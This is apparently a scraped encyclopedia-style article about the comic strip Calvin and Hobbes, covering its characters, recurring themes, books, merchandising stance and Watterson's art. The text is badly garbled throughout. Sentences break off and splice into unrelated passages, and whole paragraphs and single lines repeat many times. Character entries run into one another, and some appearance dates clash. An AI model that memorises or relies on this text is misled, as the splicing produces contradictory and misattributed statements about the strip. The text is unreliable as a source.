Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have quite a bit in common For example, Susie is shown on occasion with a stuffed rabbit dubbed "Mr Bun," and Calvin, of course, has Hobbes Susie also has a mischievous streak, which can be seen when she subverts Calvin's attempts to cheat on school tests by feeding him incorrect answers Watterson admits that Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron is also fashioned from the same cardboard box, turned upside-down, but with three strings attached to it which are used for input, output, and grounding; the grounding string functions like a lightning rod for brainstorms so Calvin can keep his ideas "grounded in reality" The strings are tied to a metal colander, which is worn on the head When used, the wearer of the cap receives a boost in intelligence, and his head becomes enlarged The intelligence boost, however, is temporary When it wears off, the subject's head reverts to its normal size Calvin creates the Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes Tenth Anniversary Book contains much original commentary from Watterson Calvin and Hobbes: Sunday Pages 1985–1995 contains 36 Sunday strips in color alongside Watterson's original sketches, prepared for an exhibition at The Ohio State University Cartoon Research Library

An officially licensed children's textbook entitled Teaching with Calvin and Hobbes was published in a limited single print-run in 1993 The book includes various Calvin and Hobbes strips, in three hardcover volumes with a total 1440 pages, was released on October 4, 2005, by Andrews McMeel Publishing It also includes color prints of the art used on paperback covers, the treasuries' extra illustrated stories and poems, and a new introduction by Bill Watterson The alternate 1985 strip is still omitted, and two other strips January 7, 1987, and November 25, 1988 have altered dialog

To celebrate the release which coincided with the strip's ten year absence in newspapers and the twentieth anniversary of the strip, Calvin and Hobbes reruns were made available to newspapers from Sunday, September 4, 2005, through Saturday, December 31, 2005,

Early books were printed in smaller format in black and white; these were later reproduced in twos in color in the "Treasuries" Essential, Authoritative, and Indispensable, except for the contents of Attack of the Deranged Mutant Killer Monster Snow Goons Those Sunday strips were never reprinted in color until the Complete collection was finally published in 2005 Every book since Snow Goons has been printed in a larger format with Sundays in color and weekday and Saturday strips larger than they appeared in most newspapers Watterson also claims he named the books the "Essential, Authoritative, and Indispensable" because as he says in The Calvin and Hobbes Tenth Anniversary Book" that he liked the fact that his strip was a "low-tech, one-man operation," and took great pride in the fact that he drew every line and wrote every word on his own

Except for the books, two 16-month calendars 1988–1989 and 1989–1990, the textbook Teaching with Calvin and Hobbes,

 Style and influences

Calvin and Hobbes strips are characterized by sparse but careful craftsmanship, intelligent humor, poignant observations, witty social and political commentary, and well-developed characters Precedents to Calvin's fantasy world can be found in Crockett Johnson's Barnaby, Charles M Schulz's Peanuts, Percy Crosby's Skippy, Berkeley Breathed's Bloom County, and George Herriman's Krazy Kat, while Watterson's use of comics as sociopolitical commentary reaches back to Walt Kelly's Pogo and Quino's Mafalda Schulz and Kelly, in particular, influenced Watterson's outlook on comics during his formative years

In initial strips, the drawings are three-dimensional Notable elements of Watterson's artistic style are his characters' diverse and often exaggerated expressions particularly those of Calvin, elaborate and bizarre backgrounds for Calvin's flights of imagination, well-captured kinetics, and frequent visual jokes and metaphors In the later years of the strip, with more space available for his use, Watterson experimented more freely with different panel layouts, art styles, stories without dialogue, and greater use of whitespace He also made a point of not showing certain things explicitly: the "Noodle Incident" and the children's book Hamster Huey and the Gooey Kablooie: it is a fictional children's book written by Mabel Syrup, it has a sequel titled Commander Coriander Salamander and 'er Singlehander Bellylander, and it is best performed with squeaky voices, gooshy sound effects, and the "Happy Hamster Hop" In its first appearance, Calvin's dad recommended it to Calvin although Calvin was reluctant due to the fact there was not an animated adaptation of it, but nearly all subsequent references to the book show Calvin's dad's frustration at having to read the story to Calvin every evening

There are eighteen Calvin and Hobbes books, published from 1987 to 2005 These include eleven collections, which form a complete archive of the newspaper strips, except for a single daily strip from November 28, 1985 the collections do contain a strip for this date, but it is not the same strip that appeared in some newspapers The alternate strip, a joke about Hobbes taking a bath in the washing machine, has circulated around the Internet  Treasuries usually combine the two preceding collections albeit leaving out some strips with bonus material and include color reprints of Sunday comics

Watterson included a unique Easter egg in The Essential Calvin and Hobbes The back cover is a scene of a giant Calvin rampaging through a town The scene is in fact a faithful reproduction of the town square actually a triangle in Watterson's home town of Chagrin Falls, Ohio Calvin and Hobbes appear in most of the strips, while a small number focus on other supporting characters The broad themes of the strip deal with Calvin's flights of fantasy, his friendship with Hobbes, his misadventures, his unique views on a diverse range of political and cultural issues and his relationships and interactions with his parents, classmates, educators, and other members of society The dual nature of Hobbes is also a recurring motif; Calvin sees Hobbes as a live tiger, while other characters see him as a stuffed animal

Even though the series does not mention specific political figures or current events like political strips such as Garry Trudeau's Doonesbury, it does examine broad issues like environmentalism, public education, and the flaws of opinion polls

Because of Watterson's strong anti-merchandising stance

History

Calvin and Hobbes was never made into an animated series Watterson later stated in the "Calvin and Hobbes Tenth Anniversary Book, the books are "obviously none of these things"

Remaining books do contain some additional content; for instance, The Calvin and Hobbes Lazy Sunday Book contains a long watercolor Spaceman Spiff epic not seen elsewhere until Complete, and The Calvin and Hobbes Tenth Anniversary Book contains much original commentary from Watterson Calvin and Hobbes: Sunday Pages 1985–1995 contains 36 Sunday strips in color alongside Watterson's original sketches, prepared for an exhibition at The Ohio State University Cartoon Research Library

An officially licensed children's textbook entitled Teaching with Calvin and Hobbes,

 Style and influences

Calvin and Hobbes strips are characterized by sparse but careful craftsmanship, intelligent humor, poignant observations, witty social and political commentary, and well-developed characters Precedents to Calvin's fantasy world can be found in Crockett Johnson's Barnaby, Charles M Schulz's Peanuts, Percy Crosby's Skippy, Berkeley Breathed's Bloom County, and George Herriman's Krazy Kat, while Watterson's use of comics as sociopolitical commentary reaches back to Walt Kelly's Pogo and Quino's Mafalda Schulz and Kelly, in particular, influenced Watterson's outlook on comics during his formative years

In initial strips, the drawings have a more cartoony, flat, crude, Peanuts-like look; in the recent strips, the drawings are three-dimensional Notable elements of Watterson's artistic style are his characters' diverse and often exaggerated expressions particularly those of Calvin, elaborate and bizarre backgrounds for Calvin's flights of fantasy, his friendship with Hobbes, his misadventures, his unique views on a diverse range of political and cultural issues and his relationships and interactions with his parents, classmates, educators, and other members of society The dual nature of Hobbes is also a recurring motif; Calvin sees Hobbes as a live tiger, while other characters see him as a stuffed animal

Even though the series does not mention specific political figures or current events like political strips such as Garry Trudeau's Doonesbury, it does examine broad issues like environmentalism, public education, and the flaws of opinion polls

Because of Watterson's strong anti-merchandising stance

History

Calvin and Hobbes was conceived when Watterson, having worked in an advertising job he detested,

The first strip was published on November 18, 1985 and the series quickly became a hit Within a year of syndication, the strip was published in roughly 250 newspapers By April 1, 1987, only sixteen months after the strip began, Watterson and his work were featured in an article by the Los Angeles Times

Before long, the strip was in wide circulation outside the United States

Watterson took two extended breaks from writing new strips: from May 1991 to February 1992, and from April through December 1994

In 1995, Watterson sent a letter via his syndicate to all editors whose newspapers carried his strip It contained the following:

    I will be stopping Calvin and Hobbes at the end of the year This was not a recent or an easy decision, and I leave with some sadness My interests have shifted however, and I believe I've done what I can do within the constraints of daily deadlines and small panels I am eager to work at a more thoughtful pace, with fewer artistic compromises I have not yet decided on future projects, but my relationship with Universal Press Syndicate will continue That so many newspapers would carry Calvin and Hobbes is an honor I'll long be proud of, and I've greatly appreciated your support and indulgence over the last decade Drawing this comic strip has been a privilege and a pleasure, and I thank you for giving me the opportunity

The 3,160th and final strip ran on Sunday, December 31, 1995

 Syndication and Watterson's artistic standards

From the outset, Watterson found himself at odds with the syndicate, which urged him to begin merchandising the characters and touring the country to promote the first collections of comic strips Watterson refused To him, the integrity of the strip and its artist would be undermined by commercialization, which he saw as a major negative influence in the world of cartoon art

Watterson also grew increasingly frustrated by the gradual shrinking of available space for comics in the newspapers He lamented that without space for anything more than simple dialogue or spare artwork, comics as an art form were becoming dilute, bland, and unoriginal

During Watterson's first sabbatical from the strip, Universal Press Syndicate continued to charge newspapers full price to re-run old Calvin and Hobbes strips Few editors approved of the move, but the strip was so popular that they had little choice but to continue to run it for fear that competing newspapers might pick it up and draw its fans away
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages
This half-page layout can easily be rearranged for full, third, and quarter pages

Then, upon Watterson's return, Universal Press announced that Watterson had decided to sell his Sunday strip as an unbreakable half page more space than I'd dared to ask for, despite the expected resistance of editors To this day, my syndicate assures me that some editors liked the new format, appreciated the difference, and were happy to run the larger strip, but I think it's fair to say that this was not the most common reaction The syndicate had warned me to prepare for numerous cancellations of the Sunday feature, but after a few weeks of dealing with howling, purple-faced editors, the syndicate suggested that papers could reduce the strip to the size tabloid newspapers used for their smaller sheets of paper … I focused on the bright side: I had complete freedom of design and there were virtually no cancellations For all the yelling and screaming by outraged editors, I remain convinced that the larger Sunday strip gave newspapers a better product and made the comics section more fun for readers Comics are a visual medium A strip with a lot of drawing can be exciting and add some variety Proud as I am that I was able to draw a larger strip, I don't expect to see it happen again any time soon In the newspaper business, space is money, and I suspect most editors would still say that the difference is not worth the cost Sadly, the situation is a vicious circle: because there's no room for better artwork, the comics are simply drawn; because they're simply drawn, why should they have more room

Calvin and Hobbes remained extremely popular after the change and thus Watterson was able to expand his style and technique for the more spacious Sunday strips without losing carriers

 Merchandising

Bill Watterson is notable for his insistence that cartoon strips should stand on their own as an art form, and he has resisted the use of Calvin and Hobbes in merchandising of any sort This insistence stuck despite the fact that it could have generated millions of dollars per year in additional personal income Watterson explains in a 2005 press release:

    Actually, I wasn't against all merchandising when I started the strip, but each product I considered seemed to violate the spirit of the strip, contradict its message, and take me away from the work I loved If my syndicate had let it go at that, the decision would have taken maybe 30 seconds of my life

Watterson did ponder animating Calvin and Hobbes, and has expressed admiration for the art form In a 1989 interview in The Comics Journal, Watterson states:

    If you look at the old cartoons by Tex Avery and Chuck Jones, you'll see that there are a lot of things single drawings just can't do Animators can get away with incredible distortion and exaggeration    because the animator can control the length of time you see something The bizarre exaggeration barely has time to register, and the viewer doesn’t ponder the incredible license he's witnessed In a comic strip, you just show the highlights of action—you can't show the buildup and release    or at least not without slowing down the pace of everything to the point where it's like looking at individual frames of a movie, in which case you've probably lost the effect you were trying to achieve In a comic strip, you can suggest motion and time, but it's very crude compared to what an animator can do I have a real awe for good animation

After this he was asked if it was "a little scary to think of hearing Calvin's voice" He responded that it was "very scary," and that although he loved the visual possibilities of animation, the thought of casting voice actors to play his characters was uncomfortable He was also unsure whether he wanted to work with an animation team, as he had done all previous work by himself Ultimately, Calvin and Hobbes was never made into an animated series Watterson later stated in the "Calvin and Hobbes Tenth Anniversary Book" that he liked the fact that his strip was a "low-tech, one-man operation," and took great pride in the fact that he drew every line and wrote every word on his own

Except for the books, two 16-month calendars 1988–1989 and 1989–1990, the textbook Teaching with Calvin and Hobbes,

 Style and influences

Calvin and Hobbes strips are characterized by sparse but careful craftsmanship, intelligent humor, poignant observations, witty social and political commentary, and well-developed characters Precedents to Calvin's fantasy world can be found in Crockett Johnson's Barnaby, Charles M Schulz's Peanuts, Percy Crosby's Skippy, Berkeley Breathed's Bloom County, and George Herriman's Krazy Kat, while Watterson's use of comics as sociopolitical commentary reaches back to Walt Kelly's Pogo and Quino's Mafalda Schulz and Kelly, in particular, influenced Watterson's outlook on comics during his formative years

In initial strips, the drawings have a more cartoony, flat, crude, Peanuts-like look; in the recent strips, the drawings are three-dimensional Notable elements of Watterson's artistic style are his characters' diverse and often exaggerated expressions particularly those of Calvin, elaborate and bizarre backgrounds for Calvin's flights of imagination, well-captured kinetics, and frequent visual jokes and metaphors In the later years of the strip, with more space available for his use, Watterson experimented more freely with different panel layouts, art styles, stories without dialogue, and greater use of whitespace He also made a point of not showing certain things explicitly: the "Noodle Incident" and the children's book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, which are known for the technical skill Watterson displayed when given a more unrestricted layout, arguing that his layouts are best read not in terms of their use of space but in terms of their depiction of time
Named after the 16th-century theologian, Calvin is an impulsive, sometimes overly creative, imaginative, energetic, curious, intelligent, and often selfish six-year-old, whose last name is never mentioned in the strip Despite his low grades, Calvin has a wide vocabulary range that rivals that of an adult as well as an emerging philosophical mind:

        Calvin: "Dad, are you vicariously living through me in the hope that my accomplishments will validate your mediocre life and in some way compensate for all of the opportunities you botched"

        Calvin's father: "If I were, you can bet I'd be re-evaluating my strategy"

        Calvin later, to his mother: "Mom, Dad keeps insulting me"

He commonly wears his distinctive red-and-black striped shirt, black pants, magenta socks and white sneakers He is also a compulsive reader of comic books and has a tendency to order items marketed in comic books or on boxes of his favorite cereal, "Chocolate Frosted Sugar Bombs" Calvin chews gum regularly and subscribes to a magazine called Chewing Throughout the series, he is also revealed to be a "trial and error" sort of person Watterson has described Calvin thus:

     "Calvin is pretty easy to do because he is outgoing and rambunctious and there's not much of a filter between his brain and his mouth"
     "I guess he's a little too intelligent for his age The thing that I really enjoy about him is that he has no sense of restraint, he doesn't have the experience yet to know the things that you shouldn't do"

 Hobbes

    Main article: Hobbes Calvin and Hobbes

Hobbes

From everyone else's point of view, Hobbes is Calvin's stuffed tiger From Calvin's point of view, however, Hobbes is an anthropomorphic tiger, much larger than Calvin and full of independent attitudes and ideas But when the perspective shifts to any other character, readers again see merely a stuffed animal, usually seated at an off-kilter angle This is, of course, an odd dichotomy, and Watterson explains it thus:

    When Hobbes is a stuffed toy in one panel and alive in the next, I'm juxtaposing the "grown-up" version of reality with Calvin's version, and inviting the reader to decide which is truer

Hobbes' true nature is made more ambiguous by episodes that seem to attribute real-life consequences to Hobbes's actions One example is his habit of pouncing on Calvin the moment he arrives home from school, an act which always leaves Calvin with bruises and scrapes that are evident to other characters In another incident, Hobbes manages to tie Calvin to a chair in such a way that Calvin's father is unable to understand how he could have done it himself Yet another incident features Hobbes leaving Calvin hanging by the seat of his pants from a tree branch above Calvin's head

Hobbes is named after the 17th-century philosopher Thomas Hobbes, who had what Watterson described as "a dim view of human nature"

Although the first strips clearly show Calvin capturing Hobbes by means of a snare with tuna fish sandwich as the bait, a later comic August 1, 1989 seems to imply that Hobbes is, in fact, older than Calvin, and has been around his whole life Watterson eventually decided that it was not important to establish how Calvin and Hobbes had first met

 Supporting characters

    Main article: Secondary characters in Calvin and Hobbes

 Calvin's family
Calvin's parents, always referred to only as "Mom" and "Dad", or "Dear" to each other

Dad's first appearance: November 21, 1985 Last appearance: October 30, 1995 unseen speaking appearance on November 6, 1995

Miss Wormwood is Calvin's world-weary teacher, named after the apprentice devil in C S Lewis's The Screwtape Letters She perpetually wears polka-dotted dresses, and serves, like others, as a foil to Calvin's mischief Throughout the strip's run, various jokes hint that Miss Wormwood is waiting to retire, takes a lot of medication, and is a heavy smoker and drinker Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a dinosaur, he is usually either a Tyrannosaurus rex, or an Allosaurus When Calvin daydreams about being these alter egos during school, Miss Wormwood often whacks his desk with a pointer to shock him back to attention

There are several repeating themes in the work, a few involving Calvin's real life, and many stemming from his imagination Some of the latter are clearly flights of fantasy, while others, like Hobbes, are of an apparently dual nature and do not quite work when presumed real or unreal

Over the years Calvin has had several adventures involving corrugated cardboard boxes which he adapts for many different uses Some of his many uses of cardboard boxes include:

     Transmogrifier
     Flying time machine
     Duplicator with ethicator enhancement
     Atomic Cerebral Enhance-O-Tron in order to be able to come up with a topic for his homework

Other kids' games are all such a bore!
They've gotta have rules and they gotta keep score!
Calvinball is better by far!
It's never the same! It's always bizarre!
You don't need a team or a referee!
You know that it's great, 'cause it's named after me!

Calvinball is a game played by Calvin and Hobbes as a rebellion against organized team sports; according to Hobbes, "No sport is less organized than Calvinball!"

The only consistent rule is that Calvinball may never be played with the same rules twice Calvinball is essentially a game of wits and creativity rather than stamina or athletic skill, a prominent nomic self-modifying game, and one where Hobbes usually outwits Calvin himself

Calvin and Hobbes frequently ride downhill in a wagon, sled, or toboggan, depending on the season, as a device to add some physical comedy to the strip and because, according to Watterson, "it's a lot more interesting 

During winter, Calvin often engages in snowball fights with Hobbes or Susie, who frequently best him due to their own wit or Calvin's unreliable aim Calvin is attentive to the craft of making a good snowball or slushball, but his delight in hitting Susie in the back of the head with a well-aimed snowball is often tempered by his anxiousness to remain on Santa's "good" list at Christmas time

Calvin is also very talented and creative at building snowmen, but he usually puts them in scenes that depict the snowmen dying or suffering in grotesque ways In one scene Calvin builds a row of saluting snowmen as a means to humiliate his dad as he returns from work "He knows I hate this," says his father as he proceeds up the front walk In another, to retaliate Susie's creation of a "snowwoman", he decides to create an "anatomically correct" snowman in the front yard His creations tend to alarm his parents due to their macabre nature In a notable storyline, Calvin builds a snowman and brings it to life in a manner reminiscent of Frankenstein's monster, and which proceeds to create more of its own kind This storyline gave the title to the Calvin and Hobbes book Attack of the Deranged Mutant Killer Monster Snow Goons, after the name Calvin gives to the first creature and its compatriots in the story

Calvin, unlike Hobbes, thinks of snowmen as fine art, worthy of highbrow criticism and expensive pricing Bill Watterson has said that he has a great deal of sympathy for Miss Wormwood, who is clearly frustrated by trying to keep rowdy children under control so they can learn something

 Rosalyn
Rosalyn, Calvin's babysitter and one-time swim instructor
Rosalyn, Calvin's babysitter and one-time swim instructor

First appearance: May 15, 1986 Last appearance: September 16, 1995

Rosalyn is a teenage high school senior and Calvin's official babysitter whenever Calvin's parents need a night out She is also his swimming instructor in one early sequence of strips She is the only babysitter able to tolerate Calvin's antics, which she uses to demand raises and advances from Calvin's desperate parents She is also, according to Watterson, the only person Calvin truly fears She does not hesitate to play as dirty as he does Calvin and Rosalyn usually do not get along, except in one case where she plays "Calvinball" with him in exchange for him doing his homework Rosalyn's boyfriend, Charlie, never appears in the strip but calls her occasionally while she babysits Originally she was created as a nameless, one-shot character with no plan for her to appear again; however, Watterson decided he wanted to retain her unique ability to intimidate Calvin, which ultimately led to many more appearances

 Moe
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school
Moe, a bully at Calvin's school

First appearance: January 30, 1986 Last appearance: November 20, 1995

Moe is the archetypical bully character in Calvin and Hobbes, "a six-year-old who shaves," who always shoves Calvin against walls, demands his lunch money, and calls him "Twinky" Moe is the only regular character who speaks in an unusual font: his frequently monosyllabic dialogue is shown in crude, lower-case letters Watterson describes Moe as "big, dumb, ugly and cruel," and a summation of "every jerk I've ever known" While Moe is not smart, he is, as Calvin puts it, streetwise: "That means he knows what street he lives on"


Principal Spittle is the principal at Calvin's school It has been implied that, as with Miss Wormwood, Calvin's behavior is the main reason Spittle dislikes his job; Calvin has been to Spittle's office enough times that his file of transgressions is the thickest in the entire district Spittle's appearances typically come in the last panel of strips that show Calvin misbehaving in class and being sent to his office, where he serves as a foil for Calvin's outlandish behavior At the beginning of the strip, Watterson says some fans were angered by the way Calvin's parents thought of Calvin his father has remarked that he would have preferred a dog instead They are not above the occasional cruelty: his mother provided him with a cigarette to teach him a lesson, and his father often tells him outrageous lies when asked a straight question Calvin's father is a patent attorney; his mother is a stay-at-home mom Both parents go through the entire strip unnamed, except as "Mom" and "Dad," or such nicknames as "hon" and "dear" when referring to each other Watterson has never given Calvin's parents names "because as far as the strip is concerned, they are important only as Calvin's mom and dad" This ended up being somewhat problematic when Calvin's Uncle Max was in the strip for a week and could not refer to the parents by name It was one of the main reasons that Max never reappeared


First appearance: December 5, 1985 Last appearance: December 16, 1995

Susie Derkins, the only important character with both a given name and a family name, is a classmate of Calvin's who lives in his neighborhood Named for the pet beagle of Watterson's wife's family, she first appeared early in the strip as a new student in Calvin's class In contrast with Calvin, she is polite and diligent in her studies, and her imagination usually seems mild-mannered and civilized, consisting of stereotypical young girl games such as playing house or having tea parties with her stuffed animals Though both of them hate to admit it, Calvin and Susie have a bit of a nascent crush on each other, and that Susie is inspired by the type of woman that he himself finds attractive and eventually married Her relationship with Calvin, though, is frequently conflicted, and never really becomes sorted out

 Miss Wormwood
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher
Miss Wormwood, Calvin's teacher

First appearance: November 26, 1985 Mom's last appearance: December 3, 1995

Mom's first appearance: November 18, 1985 Dad's last appearance: December 3, 1995

Mom's first appearance: November 26, 1985 Mom's last appearance: December 21, 1995

Calvin's mother and father are for the most part typical Middle American middle-class parents Like many other characters in the strip, their relatively down-to-earth and sensible attitudes serve primarily as a foil for Calvin's outlandish excuses for his antics

The strip primarily focuses on Calvin, Hobbes, and the above mentioned secondary characters Other characters who have appeared in multiple storylines include Calvin's family doctor whom Calvin frequently gives a hard time during his check-ups, the barber, and the extraterrestrials Galaxoid and Nebular

Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes When Calvin imagines himself as a great many things, including dinosaurs, elephants, jungle-farers and superheroes Four of his alter egos are well-defined and recurring: As "Stupendous Man", he pictures himself as a superhero in disguise, wearing a mask and a cape made by his mother, and narrating his own adventures Stupendous Man almost always "suffers defeat" to his opponent, usually Calvin's mother "Spaceman Spiff" is a heroic spacefarer As Spiff, Calvin battles aliens typically his parents or teacher and travels to distant planets his house, school, or neighborhood "Tracer Bullet," a hardboiled private eye, says he has eight slugs in him: "one's lead, and the rest are bourbon" In one story, Bullet is called to a case, in which a "pushy dame" Calvin's mother accuses him of destroying an expensive lamp broken as a result of an indoor football game between Calvin and Hobbes books, published from 1987 to 2005 These include eleven collections, which form a complete archive of the newspaper strips, except for a single daily strip from November 28, 1985 the collections do contain a strip for this date, but it is not the same strip that appeared in some newspapers The alternate strip, a joke about Hobbes taking a bath in the washing machine, has circulated around the Internet  Treasuries usually combine the two preceding collections albeit leaving out some strips with bonus material and include color reprints of Sunday comics

Watterson included a unique Easter egg in The Essential Calvin and Hobbes The back cover is a scene of a giant Calvin rampaging through a town The scene is in fact a faithful reproduction of the town square actually a triangle in Watterson's home town of Chagrin Falls, Ohio Calvin and Hobbes appear in most of the strips, while a small number focus on other supporting characters The broad themes of the strip deal with Calvin's flights of imagination, well-captured kinetics, and frequent visual jokes and metaphors In the later years of the strip, with more space available for his use, Watterson experimented more freely with different panel layouts, art styles, stories without dialogue, and greater use of whitespace He also made a point of not showing certain things explicitly: the "Noodle Incident" and the children's book Hamster Huey and the Gooey Kablooie were left to the reader's imagination, where Watterson was sure they would be “more outrageous” than he could portray

Watterson's technique started with minimalist pencil sketches drawn with a light pencil though the larger Sunday strips often required more elaborate work; he then would use a small sable brush and India ink on the Strathmore bristol board to complete most of the remaining drawing He also letters dialogue with a Rapidograph fountain pen, and he uses a crowquill pen for odds and ends He whites out the mistakes with Liquid Paper He was careful in his use of color, often spending a great deal of time in choosing the right colors to employ for the weekly Sunday strip When Calvin and Hobbes started, there were 64 colors available for the Sunday strips For the later Sunday strips, Watterson had 125 colors, as well as the ability to fade the colors into each other

 Art and academia

Watterson used the strip to criticize the artistic world, principally through Calvin's unconventional creations of snowmen but also through other expressions of childhood art When Miss Wormwood complains that he is wasting class time drawing incomprehensible things a Stegosaurus in a rocket ship, for example, Calvin proclaims himself "on the cutting edge of the avant-garde" He begins exploring the medium of snow when a warm day melts his snowman His next sculpture "speaks to the horror of our own mortality, inviting the viewer to contemplate the evanescence of life" In further strips, Calvin's creative instincts diversify to include sidewalk drawings or as he terms them, examples of "suburban postmodernism"

Watterson also lampooned the academic world In one example, Calvin writes a "revisionist autobiography", recruiting Hobbes to take pictures of him doing stereotypical kid activities like playing sports in order to make him seem more well-adjusted In another strip, he carefully crafts an "artist's statement," claiming that such essays convey more messages than artworks themselves ever do Hobbes blandly notes "You misspelled Weltanschauung" He indulges in what Watterson calls "pop psychobabble" to justify his destructive rampages and shift blame to his parents, citing "toxic codependency" In one instance, he pens a book report based on the theory that the purpose of academic scholarship is to "inflate weak ideas, obscure poor reasoning, and inhibit clarity," entitled The Dynamics of Interbeing and Monological Imperatives in Dick and Jane: A Study in Psychic Transrelational Gender Modes Displaying his creation to Hobbes, he remarks, "Academia, here I come!" Watterson explains that he adapted this jargon and similar examples from several other strips from an actual book of art criticism

Overall, Watterson's satirical essays serve to attack both sides, criticizing both the commercial mainstream and the artists who are supposed to be "outside" it Not long after he began drawing his "Dinosaurs In Rocket Ships" series, Calvin tells Hobbes:

